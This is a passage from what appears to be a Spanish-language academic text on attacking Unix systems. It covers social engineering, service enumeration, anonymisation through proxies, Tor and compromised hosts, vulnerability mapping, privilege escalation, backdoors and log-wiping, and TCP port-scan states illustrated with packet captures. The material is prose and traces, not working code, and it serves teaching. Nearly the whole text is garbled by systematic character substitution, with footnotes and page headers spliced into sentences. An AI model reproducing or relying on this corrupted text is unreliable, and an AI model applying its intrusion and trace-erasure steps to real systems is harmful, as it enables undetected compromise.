cualquier otra "recauci8n "uede ser vencida "or un decidido atacante con "osesi8n /)sica de una co "utadora. Con/igurar "er isos de arc$ivos# establecer contraseBas de acceso# ' ocultando el Glti o no bre de usuario ' contraseBa utilizados "ara iniciar la sesi8n son todos intentos loables# "ero no van a /rustrar a un atacante e9"eri entadoD. As) ' todo# $a' (umpster diving uc$as $istorias ' técnicas sobre bGsqueda activa de
7%6<6=(U/P8%

debilidades de este ti"o que se distribu'en "or la red# co o "or eje "lo%

Consiste

en

revolver

la

basura

;literal ente> de la organizaci8n# en busca de in/or aci8n Gtil. Muc$as e "resas no tienen un control sobre lo que se desec$a ' lo que no# ' "uede ser interesante "ara obtener docu entaci8n# disco r)gido roto o anticuado "uede contener "ara un ataque e9itoso.

edios

agnéticos# etcH un

uc$)si a in/or aci8n Gtil

>ock picking 7%6<6=>?&<8% Fécnicas "ara abrir cerraduras# sin daBarlas ' sin "oseer la llave. 7nstalaci8n de <e1loggers "or $ardIare S47R7UR:?PT % 2n 6e'logger "or $ardIare es un dis"ositivo que se conecta al teclado# o al "uerto 2,B que registra en su disi ulado. e oria todo lo que el usuario tecle8# estando escondido o

S oulder Surfing 7%6<6=SSF8% Alguien entrenado a $us ear las contraseBas de los de ás ientras las ti"ean. Pigg1backing 7%6<6=P6@8% Consiste en $acerse "asar "or alguien autorizado "ara sortear un "uesto de seguridad# co o "uede ser la entrada a un edi/icio.

-.-.2. Acceso <e oto. Enu eraci8n de ,ervicios.
:a a'or)a de las $erra ientas e in/or aci8n dis"onibles se re/ieren a éste ti"o de análisis% c8 o buscar vulnerabilidades a un deter inado siste a en /or a re ota. En este caso# el atacante co ienza a utilizar $erra ientas de escaneo2- de "uertos '&o servicios# redes ' $osts dis"onibles# 'a que de esa alcanzables%
2- escaneo% se le deno ina as) en la jerga# ' "roviene de una castellanizaci8n del verbo en inglés scanningH en es"aBol signi/ica CrastreoD. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 2- de 2*.

anera intenta

recabar in/or aci8n sobre qué caracter)sticas es"ec)/icas tienen los objetivos

Ca")tulo -. ( -.-.BGsqueda ' rastreo de vulnerabilidades.

Aistemas de 1onitoreo ! de 2iltrado de trá=ico% 75,s# 7!,s# FireIalls# <outers# ,Iitc$es# etc. Aistemas 0perativos% 2ni9 ;,olaris# B,5s# etc.># :inu9# @ovell# Mac ?, A# 4indoIs# etc. ' sus versiones en "articular. AervidoresGAervicios% FF!# 4eb# Mail# 5@,# Fer inales# L!@# etc.H qué so/tIare ejecutan "ara i "le entar dic$o servicio ' en qué versiones# tanto del "rotocolo del servicio co o del so/tIare. Aplicaciones%

A"licaciones 4eb% CM,s ;Content Manage ent ,'ste s># Frac6ing# A"licaciones que ,"a ' Anti(Lirus.

7ssue

anejan el correo entrante ' saliente% ,o/tIare Anti(

○ ○ ○

A"licaciones co erciales% ,iste as de Pesti8n# E<!&C<M. A"licaciones de co unicaci8n% Mensajer)a instantánea# 7<C. Foda a"licaci8n que utilice la red ' esté brindando un servicio a través de ella.

,i la objetivo# el

eta del atacante en esta eta"a es tener una Cradiogra/)aD del siste a edio "ara generarla es realizar una detecci8n de los "uertos

abiertos21 en "ri era instancia# ' luego deter inar la versi8n es"ec)/ica ;o al enos a"ro9i ada> del so/tIare que está detrás# en lo que se conoce co o enumeraci-n. Co o "uede deducirse al ver el listado# as) co o la cantidad de "osibilidades es real ente enor e# existe una cantidad i)ual de )rande de pro)ramas desarrollados en pos de o(tener in=ormaci-n remotaH con el tie "o# un crac6er e9"eri entado "uede $acerse de un Ctool6itD25 i "ortante ' diverso de so/tIare "ara obtener in/or aci8n ' veri/icar debilidades en los siste as. AGn as)# se "uede considerar a Nmap co o el ás utilizado 'a que es el

21 2n puerto ;en el "rotocolo FC!> es un nG ero que re"resenta una cone9i8n con la ca"a de red 7! del ,iste a ?"erativo. !uede tener varios estados# ' el estado CabiertoD signi/ica que $a' un "rogra a asociado al is o que está escuc$ando "or "eticiones de otros "rogra as en la red# usual ente "ara devolverle algGn resultado 25 Fool6it% Conjunto o CCajaD de $erra ientas. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 21 de 2*.

Ca")tulo -. ( -.-.BGsqueda ' rastreo de vulnerabilidades.

ás versátil ' "oderoso# "ero e9isten ="ing ' ,ca"'# @essus# Core 7 "act# 7 ca"acidades di/erentes. Es

uc$os otros generales ta bién co o

ás otros con /ines es"ec)/icos co o 7ngu a# @i6to# Metas"loit# unit' Canvas# etc.# cada uno con objetivos ' ás# la red está "oblada de estas $erra ientas# '

cualquier $ac6er "odr)a desarrollar una que obtenga in/or aci8n a "artir de alguna vulnerabilidad nueva# "ublicada o conocida. 7ncluso algunos co binan estas técnicas de rastreo con una base de datos de vulnerabilidades ' $asta la anera de e9"lotarlas ;e9"loits>. :a idea es "resentarle anera# con al ad inistrador una suite co "leta de penetration testingAB. 5e esa

una Gnica $erra ienta# un técnico "uede rastrear uno o varios siste as de la e "resa# ' ésta# con una inter/az grá/ica a igable# ejecuta los siguientes "asos% *. Mediante so/tIare de rastreo e identi/icaci8n# realiza las averiguaciones de la e9istencia o no ' versi8n de los di/erentes co "onentes de so/tIare que se están ejecutando en el objetivo. 2. Co "ara los resultados con su base de datos de /ir as2+. -. Muestra un in/or e con las vulnerabilidades detectadas# la gravedad que re"resentan# ' c8 o se "uede re ediar o al enos itigar. 1. !er ite ejecutar e9"loits relacionados# con el /in de co "robar si real ente e9iste la vulnerabilidad ' qué consecuencias conlleva. 5. <ealiza una li "ieza de todo lo $ec$o. Co o "uede verse# realizan todos los "asos t)"icos de un test de "enetraci8n )ntegro. Estas $erra ientas tienen uc$)si a utilidad "ara los ad inistradores de siste as ' redes grandes# 'a que entre sus ventajas se cuentan% <educir la co "lejidad de una auditor)a. !er itir realizar un análisis Cquic6 and dirt'D2O del estado general en

● ●

2J Ler Plosario% !enetration Festing# "ág. *0-. 2+ /ir a% una /ir a ;ta bién deno inado CfingerprintD# o C$uella digitalD> es una secuencia de b'tes que identi/ican un)voca ente algoH en el conte9to se re/iere a una /ir a del conjunto de "rogra as que se están ejecutando en el o los siste as re otos. 2O Cquic6 and dirt'D% <á"ido ' sucio. Es una /rase de la jerga que signi/ica resolver un "roble a en /or a rá"ida "ero sin eli inar en /or a co "leta el general ente es un "roceso ás co "lejo ' largo>. otivo que lo caus8 ;lo cual

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 25 de 2*.

Ca")tulo -. ( -.-.BGsqueda ' rastreo de vulnerabilidades.

cuanto a seguridad de la organizaci8n.
● ●

@o se necesitan e9"ertos "ara realizarlo. Es ás barato ' re"roducible las veces que se necesiten# que contratar a un equi"o e9terno ;o interno> de "enetration testers una Gnica vez. ,in e bargo su objetivo s8lo es $acer un test de "enetraci8n de /or a

si "le# ' ade ás de ser onerosas ;algunas># s8lo conte "lan un conjunto sie "re reducido de ca"acidades# 'a que las base de datos de e9"loits son desarrolladas ' ad inistradas "or el "roveedor del so/tIare. Ade ás# dada su naturaleza# es s8lo un e9a en de seguridad a nivel de so/tIare# ientras que no tienen en cuenta las $abilidades del atacante "ara e9"lotar la ingenier)a social# utilizar e9"loits que no $a'an sido $ec$os "Gblicos# arreglados# desarrollados o conocidos aGn# a"rovec$ar de/iciencias en la o"eratoria de la organizaci8n# e in/inidad de CagujerosD "or donde el intruso "uede atacar. Es decir# es una $erra ienta de =uncional de los crac:ers. uc$a a'uda# "ero no es >el? reempla3o

-.1. Buscando el Anoni ato en la red
A edida que el atacante e9"lora las redes del objetivo en cuesti8n# $a' que u' "robable que dic$a co unicaci8n quede registrada "ensar ta bién en que es que es /in. Ka que es i "ortante "ara el intruso no dejar rastros# o al esta tarea# $a' uc$as /or as "or las cuales se "uede lograr. enos# di/icultar

en uno o varios lugares% "roveedores de internet# routers ' redes inter edias# ' lo ás i "ortante% logs20# siste as de identi/icaci8n de intrusos ;75,s> ' onitoreo en el siste a objetivo is o o en equi"os destinados a tal siste as de

-.1.*. <edes ' ,iste as An8ni os
:os siste as an8ni os son la anera ás sencilla de Cdes"erdigarD el rastro del origen del ataque. E9isten innu erables equi"os en internet listos "ara ser utilizados co o prox1-.# tanto de "rotocolos Ieb co o de "rotocolos FC!# garantizando anoni ato co "letoH es "osible ta bién CencadenarD varios nodos
20 Ler Plosario% :og# "ág. *02. -. Ler Plosario% !ro9'# "ág. *0-. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 2J de 2*.

Ca")tulo -. ( -.1.Buscando el Anoni ato en la red

Can8ni osD antes de alcanzar el objetivo# aunque esto re"ercuta en la de ora del env)o ' rece"ci8n de los ensajes. Fa bién es "osible utilizar una red de "ro9's ;en /or a de gra/o no dirigido> que realizan su co unicaci8n en /or a encri"tada ' variando los CsaltosD que recorre el trá/ico "or cone9i8n% Tor-*. ?tra "osibilidad es utilizar lugares "Gblicos de acceso a internet# cone9iones de terceros# etc. :as "osibilidades son a "lias# conocidas ' de"endiendo del nivel de anoni ato# co "lejidad ' velocidad# el intruso ;o varias> de ellas. u' "robable ente elegirá alguna

-.1.2. 2tilizaci8n de MalIare
?tra técnica de anoni ato consiste en utilizar so/tIare escrito con /ines aliciosos ;C alIareD># "revia ente instalado en equi"os ajenos# "ara controlarlos re ota ente ' realizar actividades "osteriores# $aciéndose "asar "or ellos. 5entro del vasto estos%

undo del

alIare# un atacante "uede utilizar alguno de

Birus S47R7UL7<2,T: 2n virus es un "rogra a escrito con la /inalidad de ser instalado inadvertida ente "or el usuario de un siste a# "asando desa"ercibido durante todo su ciclo de vida# ' que "uede re"roducirse a s) is o en otros nodos la a'or cantidad de veces que "ueda# tal co o los ientras reside en el equi"o de"ende de su virus biol8gicos. Vué $ace

"rogra aci8n# "ero suele "oseer el control co "leto del equi"oH "udiendo eli inar arc$ivos# establecer contacto con la red# etc. 2n virus "uede ser utilizado-2 "or un crac6er "ara dirigir desde los nodos a/ectados un ataque a un objetivo en "articular# en un deter inado o ento.

Horms S47R7U4?<MT: 2n Ior

o gusano es

u' si ilar a un virus étodos de

;t)"ica ente es con/undido con uno de ellos cuando de usuarios no es"ecializados se trata># con la salvedad de que sus
-* For% F$e ?nion <outer. 2<:% $tt"%&&III.tor"roject.org -2 El c8digo /uente de los virus suele conocerse o di/undirse "ri era ente en sitios rec8nditos de internet# en redes Cde con/ianzaD# redes de crac6ers# salas de c$at# etc. Esto /acilita la odi/icaci8n ' "ro"agaci8n de los ejecutables antes que las e "resas /abricantes de antivirus "uedan reaccionar. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 2+ de 2*.

Ca")tulo -. ( -.1.Buscando el Anoni ato en la red

"ro"agaci8n son di/erentes. :os Ior s utilizan vulnerabilidades re otas de seguridad conocidas de siste as o"erativos# servicios ;4eb# Base de 5atos# Mail# Ft"># etc. "ara to ar el control de un $ost ;equi"o> conectado a la red. ,i bien se "uede su"oner que al ser vulnerabilidades conocidas ;' con cierta antig^edad> su )ndice de é9ito será bajo# en realidad general ente tienen bastante é9ito# ' re otas graves ' de so/tIare uc$os "roble as a 2n Ior uso intensivo de recursos% C!2# "uede ser creado o ás si se trata de vulnerabilidades u' utilizado. 2sual ente agota o $ace un e oria# disco# red# etc. ' esto causa odi/icado "ara to ar el control de

edida que se e9tiende.

cualquier objetivo conectado a la red# con el "ro"8sito de que se una a una botnet ;ver debajo> o que sirvan de nodo inter edio "ara ser controlados re ota ente instalando "uertas traseras ;ver "ág. -*> o root6its ;ver abajo># ' "osterior ente realizar ataques u obtener in/or aci8n del objetivo. Cuando un nodo es conquistado ' se lo antiene bajo control "ara "osteriores actividades# se lo deno ina C3om(ieD S47R7UQ?MB7ET.

Root:its S47R7U<R7FT: 2n root6it es un ti"o de "rogra as que co o gru"o son diseBados "ara vulnerar ' ca u/larse en el siste a objetivo# dis"oniendo del control total del equi"o ' de las utilidades de odi/icando el co "orta iento onitoreo# ad inistraci8n ' seguridad del siste a

o"erativo "ara evitar ser detectados. !uede ser instalado "or un tro'ano ;ver "ág. 2*># un Ior # ser ejecutado "or el usuario inducido "or el atacante v)a ingenier)a social# etc. En la a'or)a de los casos# instalan una "uerta trasera "ara que el atacante acceda sin "roble as en /or a re ota. Con alguna o varias de estas $erra ientas es "osible que el atacante utilice los equi"os bajo su control ;sus Czo biesD> directa ente $acia el objetivo# o ta bién "uede organizar una red de ellos# es"erando conjunta ente "or sus 8rdenes# lo que se deno ina una &otnet S47R7UB@EFT.

-.5. Ataque e 7ntrusi8n
-.5.*. Ma"eo de Lulnerabilidades
A esta altura# luego de la eta"a de enu eraci8n# el atacante tiene un a"a

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 2O de 2*.

Ca")tulo -. ( -.5.Ataque e 7ntrusi8n

con

a'or o

enor "recisi8n de lo siguiente%

● ● ● ●

Estructura de las <edes ' "untos de entrada&salida "Gblicos '&o "rivados. Vué servicios se brindan en cada uno ' "ara quién. Vué so/tIare ' dis"ositivos se ejecutan en cada nivel de la "ila FC!&7!. :a gente que lo ad inistra# in/or aci8n "ersonal. Con toda esta in/or aci8n# obtenida a lo largo del "er)odo de investigaci8n# ás un "er/il técnico o social ' quizás algo de

quizás 'a sea "osible crear una lista de vulnerabilidades "otenciales "or las cuales el atacante "odrá vencer a las l)neas de de/ensa del objetivo. 5ic$a lista es el "roducto del análisis conocido co o mapeo de vulnera(ilidades--. :o ideal es "riorizar dic$a lista# identi/icando la di/icultad in$erente de cada agujero detectado o que se sos"ec$a que e9iste. Fa bién# si se investig8 una red o varios $osts# se "uede "riorizar "or equi"o% "or eje "lo# los siste as que se encuentran en eta"a de "ruebas ;Ctest.e "resa.co D># o con ás vulnerables ' general ente uc$os servicios abiertos# serán enos vigilados que los que están en "roducci8n#

"or lo que son "re/eribles "ara co enzar el ataque. Ade ás es a"licable una veri/icaci8n de no estar atacando algGn $one'"ot-1. Es decir# a"licar el sentido co Gn en el ordena iento de los objetivos es "ri ordial en esta "arte del "roceso. 2na buena de/inici8n ;S=ACRUEA!T# ca". 5> de quizás# la eta"a i "ortante antes de atacar el objetivo es% CEl ás a"eo de vulnerabilidades es el

"roceso de relacionar atributos es"ec)/icos de seguridad de un siste a a una vulnerabilidad asociada o "otencial. Esta es una /ase cr)tica en la e9"lotaci8n de un siste a objetivo que no deber)a ser "asada "or alto.D Co o a'uda# el atacante "uede recurrir a bases de datos "Gblicas de

-- :a "alabra C a"eoD es una castellanizaci8n del inglés C a"D# que signi/ica trazar en un ,e utiliza -1 Ler Plosario% =one'"ot# "ág. *0-.

a"a.

uc$o "ara $acer re/erencia a la traza de "untos# ideas# relacionar una cosa con otra.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 20 de 2*.

Ca")tulo -. ( -.5.Ataque e 7ntrusi8n

vulnerabilidades% la lista de correo Bugtraq-5# el CE<F-J# CLE-+# ,ecunia-O# directa ente de los /abricantes del so/tIare que o"era el objetivo# ' varias listas de seguridad dis"ersas "or 7nternet. Fa bién e9isten sitios donde se consiguen ;o aneras de co "rar-0> e9"loits# $erra ientas# in/or aci8n no docu entada ni "Gblica# etc. que "ueden ser Gtiles "ara introducirse en el siste a objetivo. ?tra o"ci8n es el uso de $erra ientas de "enetration testing co o las que se vieron en la "ágina 25# aunque libres de uso# co o @essus o Metas"loit# ' con "osibilidades de e9tenderlas ediante "rogra as "ro"ios ;dic$as $erra ientas "oseen ca"acidad de ser e9tendidas ' "ersonalizadas>.

-.5.2. E9"lotaci8n e intrusi8n
AGn a "esar de todo el análisis "revio ' "re"araci8n que "ueda tener# en un ataque es di=6cil tener éxito. Es un "roceso donde la "aciencia "one a "rueba al atacante% básica ente# consiste en recorrer la lista elaborada en la eta"a de $acerlo. !robable ente se consiga acceso co o usuario sin "rivilegios# en donde si bien se consigue la in/or aci8n ' "rocesos que dis"onga o aneje ese usuario# no se obtiene control total del equi"oH en ese caso# "ara obtener derec$os de ad inistrador ;el usuario root en la /a ilia de siste as 2ni9># se realiza lo que se lla a una escalada de privile)ios# que ta bién "uede a"rovec$ar errores de con/iguraci8n# agujeros de seguridad# claves /áciles de desci/rar# etc. del siste a objetivo. !ara desarrollar ' utilizar todas estas técnicas# técnica ente es i "rescindible "oseer conoci ientos de "rogra aci8n en bajo nivel# de uno o varios ,?s# "rotocolos varios ' algunas virtudes e9tra% sentido co Gn# $abilidad#
-5 :a lista Bugtraq es "arte del sitio ,ecurit' Focus. 2<:% $tt"%&&III.securit'/ocus.co & -J CE<F% El CE<F es un "ro'ecto llevado adelante "or la 2niversidad Carnegie Mellon. 2<:% $tt"%&&III.cert.org -+ CLE% Co on Lulnerabilities and E9"osures# es una base de datos de vulnerabilidades u' "o"ular /inanciada "or el 5e"to. de ,eguridad de los Estados 2nidos. -O ,ecunia% Es un servicio de in/or aci8n sobre seguridad in/or ática danés. 2<:% $tt"%&&secunia.co & -0 Actual ente# e9iste un ercado de co "ra(venta de e9"loits ' vulnerabilidades cada vez ás grande# que crece en /or a e9"onencial de un aBo a otro. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -. de 2*.

a"eo

de vulnerabilidades# conseguir las $erra ientas necesarias "ara llevarlo a cabo '

Ca")tulo -. ( -.5.Ataque e 7ntrusi8n

inteligencia ' sobre todo# "erseverancia.

-.J. !uertas traseras ' Eli inaci8n de $uellas
2na vez obtenido el control "retendido "or el atacante# éste tiene varios ca inos a to arH una o"ci8n ser)a "ara averiguar qué in/or aci8n antener el control evitando ser detectado# ecanis o "or el cual el atacante aneja el siste a# la red# los usuarios# etc.

2na "uerta trasera ;C&ac: DoorD> es un

asegura el control "osterior ' a voluntad del siste a co "ro etido. Peneral ente es un so/tIare que está a la es"era de cierta actividad re ota# "or eje "lo# enviando una co binaci8n o secuencia de "aquetes con cierto contenido ;CAin)le 4ac:et Aut9enticationD># o el caso es"ecial ente a una co binaci8n de algunos casos. ?tra alternativa# si es que 'a se obtuvo todo lo que se deseaba# ser)a eli inar todo rastro del ataque% li "iar $istoriales de co andos# arc$ivos te "orales# restableci iento de algGn servicio a/ectado# "er isos de arc$ivos# etc. ás t)"ico% una ter inal que res"onde usuario&contraseBa# s8lo "or no brar

-.+. Atacar otro siste a
?tra alternativa del atacante# una vez que se tiene el control del objetivo# o al enos acceso re oto# es instalar so/tIare "ara atacar local ente a otro u' "robable ente de su real interés. Algunas de las "osibilidades que anera "asa desa"ercibido si es un siste a#

tiene el atacante son%

7nstalar un rootkit ;ver "ág. 2O>% de esa $ost que se utiliza o descubierto.

onitorea en /or a regular# donde el ataque "uede ser

7ns"eccionar ' analizar los arc$ivos ' "rocesos a los cuales se tiene acceso# en busca de in/or aci8n "ara avanzar al "r89i o salto. Modi/icar arc$ivos# utilizar de alguna engaBar a un usuario. anera ingenier)a social "ara

7nstalar un sniffer# en busca del trá/ico de la red a la cual está conectado. Es u' co Gn "oder detectar contraseBas en te9to claro# que estén siendo interca biados "or "rotocolos no encri"tados ;=FF!# FF!# ,MF!#

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -* de 2*.

Ca")tulo -. ( -.+.Atacar otro siste a

"rotocolos "lanos sin F:,1.&,,:1*# etc.>H las redes con utadas ;unidas "or sIitc$es> no son un "roble a si se utilizan técnicas de A<!12 ,"oo/ing1- o si ilares.

7nstalar so/tIare que se a"rovec$e del uso del equi"o# co o "or eje "lo un ke1logger "or so/tIare. Evidente ente# el grado de é9ito de la "er anencia en el objetivo estará

dado "or la relevancia del siste a co "ro etido ' las

edidas que se estén

i "le entando en la organizaci8n "ara aislarse de los ataques en cuanto a étodos de control# con/idencialidad ' autenticaci8n de seguridad a los distintos equi"os ' dis"ositivos de red.

1. Ler Plosario% F:,# "ág.# *01. 1* Ler Plosario% ,,:# "ág. *01. 12 Ler Plosario% A<!# "ág. *02. 1- ,"oo/ing% C!arodiaD en castellano. C,"oo/ingD trata de un conjunto de técnicas "ara /alsi/icar ' $acer "asar un ele ento inválido o no autorizado "or otro que s) lo está. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -2 de 2*.

Ca")tulo 1. ( Ca")tulo 1. !ort ,canning

/ap6tulo <. 4ort Acannin)
5entro de las técnicas de o(tenci-n activa de in=ormaci-n de una red objetivo# "revio a e/ectuar el ataque# ésta se realiza con varias $erra ientas distintas. En "ri era instancia# la CagujerosD "or d8nde ingresar. ás i "ortante quizás sea el "ort scanner# un so/tIare que brinda datos su/icientes al atacante co o "ara e "ezar a encontrar

1.*. Método de Funciona iento ' ?bjetivos
El /unciona iento de los "ort scanners se basa en enviar uno o varios "aquetes "or la red ;lla ados probes, co o las "ruebas de laboratorio># ' luego aguardar "or los resultados. !uede suceder que se reciba una res"uesta# del objetivo o de algGn $ost inter edio ;un router&/ireIall que aneje trá/ico entre el origen ' el destino># o que no se reciba ninguna. Cada caso tiene un signi/icado# de"endiendo del ti"o de scanning que se $a'a utilizado ' de la res"uesta en s). !or otra "arte# ta bién tiene que ver el "rotocolo a utilizarH en el stac6 FC!&7!v1 ;el ás e9tendido en la actualidad># los "rotocolos que intervienen en odelo ?,7 SC,C?U7@EFBA,T>% 7CM!11# odelo# que es 7!1+. Cabe estas "ruebas son aquellos de ca"a 1 ;del

FC!15 ' 25!1J# "or enci a de la ca"a - de dic$o

aclarar que si bien el "rotocolo 7CM! interviene en los escaneos 'a que brinda in/or aci8n en ciertos casos# los tipos de port scannin) son dos: T/4 o UD4 ;no e9isten los C"uertos 7CM!DH "or eje "lo# cuando se $abla de un "uerto CabiertoD en el esque a FC!&7!# necesaria ente es FC! o 25!>. :a idea es plenamente ;la ani"ular ;o a veces no> los "aquetes a enviar# no respetando a'or)a de los casos> los "rotocolos establecidos "or el 7EFF 1O. El

objetivo "or lo general es%
● ●

Aer rápido. 2n escaneo "uede to ar $oras ' $asta d)as en una red 4A@. Aer preciso. !ara evitar los /alsos "ositivos ' detectar "uertos real ente

11 7CM!% 7nternet Control Message !rotocol ;!rotocolo de Mensajes de Control de 7nternet>. ,i bien no es "rotocolo de Ca"a 1 "or de/inici8n 'a que no trans"orta in/or aci8n de los usuarios# de"ende ' es enca"sulado "or un "aquete 7! "ara /uncionar. Ler SFC!&7!U7llT# Ca". J. 15 FC!% Frans ission Control !rotocol ;!rotocolo de Control de Frans isi8n>. Ler SFC!&7!U7llT# Ca"s. *+ al 21. 1J 25!% 2ser 5atagra **. 1+ 7!% 7nternet !rotocol ;!rotocolo de 7nternet>. Ler SFC!&7!U7llT# Ca". -. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -- de 2*. !rotocol ;!rotocolo de 5atagra a del 2suario>. Ler SFC!&7!U7llT# Ca".

Ca")tulo 1. ( 1.*.Método de Funciona iento ' ?bjetivos

abiertos.

!asar lo

ás desaperci(ido ;stealt > "osible "ara evitar la detecci8n de

los ad inistradores del sitio objetivo. FC!# al i "le entar =ia(ilidad en la co unicaci8n de la carga ;ta bién lla ado pa1load># debe anejar di/erentes estados de cone9i8n# tanto en el trans isor co o en el rece"tor ;a bos 'a que nor al ente las cone9iones FC! son bidireccionales>. Este $ec$o# ' su ado a que la >interesante? para el atacante# con a'or)a de los servicios se i "le entan sobre FC!# $ace que el escaneo de puertos T/4 sea más a'or "otencial "ara a"rovec$ar vulnerabilidades ' de/iciencias en la in/raestructura.

1.2. Estados de un !uerto
5esde el "unto de vista de la "ersona que está buscando activa ente in/or aci8n de una red e9terna# un "uerto FC! o 25! "uede estar en alguno ;o varios a la vez# co o 'a se verá> de los siguientes estados%

1.2.*. !uerto Abierto ;C?"en !ortD>
2n "uerto se encuentra abierto cuando el destino10 res"onde e9itosa ente al test. El "ort scanner "uede detectar que e/ectiva ente $a' un servicio es"erando "or cone9iones ;FC!> o datagra as ;25!> en el "uerto sobre el cual se $ace la "rueba.

1O 7EFF% 6nternet 3ngineering -ask Force N Pru"o de Frabajo en 7ngenier)a de 7nternet. Es la organizaci8n que actual ente ;' desde que /ue creada en *0OJ> regula los "rotocolos técnicos ' desarrolla los estándares a lo largo ' anc$o de la 7nternet. 5ic$os estándares se "ublican co o docu entos lla ados <FC ;:e#uest for &omments N !edido de Co entarios>. Ler $tt"%&&III.iet/.org& ' $tt"%&&tools.iet/.org&$t l& "ara la base de datos de <FCs. 10 En estos casos# se $abla del CdestinoD co o un todo cuando en realidad# lo que recibe ' contesta o no dic$o a test es un "rogra a o servicio que está escuc$ando en el "uerto en el que se está realizando la "rueba. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -1 de 2*.

Ca")tulo 1. ( 1.2.Estados de un !uerto
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.0011)7 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0356+0 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: + Tiempo: 0.036((+ Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 5 Tiempo: 0.036(+3 Origen: 19(.16).0.(:5)071 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5)071 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: 6 Tiempo: 0.039((0 Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:5)071 Proto!o"o: T,P De !rip!i%n: (( > 5)071 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 7 Tiempo: 0.039(66 Origen: 19(.16).0.(:5)071 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5)071 > (( -$.T0 .eq11 2en10

Ca"tura *% Eje "lo de !uerto FC! 22 abierto en el $ost *02.*JO...-.

Co o se "uede ver# en la Ca"tura * de Frá/ico de <ed ;que ocurre a bajo nivel> sucede lo siguiente%

uestra lo que

7. 4aquetes 7.<: :uego de 2 A<! <equest ;que "er iten averiguar la direcci8n MAC dada una 7!# "aso "revio ' necesario al env)o de tra as al objetivo> se obtiene la res"uesta A<! desde el $ost destino. +. 4aquetes .": El "ort scanner# desde el "uerto origen FC! 5O.+*# env)a al "uerto FC! 22 del objetivo un "aquete con el flag ,K@5. activado# seBal de inicio de una cone9i8n. Co o dic9o puerto está asociado a un

5. :os flags# o en castellano# CbanderasD# son bits deter inados en el encabezado de los "aquetes FC! ;Ca"a 1>. :os bits que "ueden ser utilizados son% 2<P# ACR# !,=# <,F# ,K@ ' F7@. Ler Ane9o A. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -5 de 2*.

Ca")tulo 1. ( 1.2.Estados de un !uerto

servicio 7# el ,iste a ?"erativo destino res"onde con un ,K@_ACR52. :uego el "aquete llega al origenH no $a' dudas# al recibir el ,K@_ACR desde el "uerto 22# el "ort scanner está seguro de que algGn servicio está escuc$ando all)# "or lo que se ter ina la "rueba# esta(leciendo que el puerto ++ del o(jetivo está a(ierto. !or Glti o# se env)a un nuevo "aquete con el flag <,F ;de CresetD> "ara i "edir el estableci iento co "leto de la cone9i8n. As) la "rueba trata de "asar desa"ercibida5- "ara el $ost destino.

1.2.2. !uerto Cerrado ;CClosed !ortD>
El "uerto está cerrado cuando co o res"uesta se recibe un "aquete con el /lag de reset ;<,F> en el caso de FC!# ' un 7CM! ti"o -&c8digo - ;C (estination Unreac ableCPort Unreac ableD ( 5estino 7nalcanzable&!uerto 7nalcanzable> en el caso de un test 25!.
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.035)+9 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0696(6 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: + Tiempo: 0.069991 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6

5* Cuando se $abla de un servicio# la re/erencia es $acia un "rogra a# so/tIare# agente o co Gn ente Cde onioD ;CdaemonD> en los ,iste as ?"erativos ti"o 2ni9. 52 @o olvidar la secuencia de un t)"ico t$ree(Ia' $ands$a6e FC!% ,'n → ,'n_Ac6 → Ac6.

ás

5- El escaneo que se realiz8 en este caso /ue de ti"o CStealt D# esto e9"lica el <,F "ara no establecer co "leta ente la cone9i8n. Ler ás adelante en este ca")tulo los ti"os de escaneo. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -J de 2*.

